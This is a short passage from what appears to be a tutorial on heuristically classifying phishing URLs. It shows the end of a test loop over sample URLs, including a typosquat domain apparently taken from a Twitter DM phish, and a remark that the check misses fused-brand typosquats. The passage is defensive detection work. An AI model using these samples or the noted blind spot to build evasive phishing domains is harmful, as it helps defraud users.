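              "https ://www.flexdirect.adp .com/client/login.aspx", "ivtwtter.com"):
        print(classify(t))
```

    The check stops at stacked labels and fused brand words: a typosquat such as ivtwtter.com from the Twitter DM phish above returns no reasons and would need an edit-distance comparison against the brand list, which is out of scope here.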
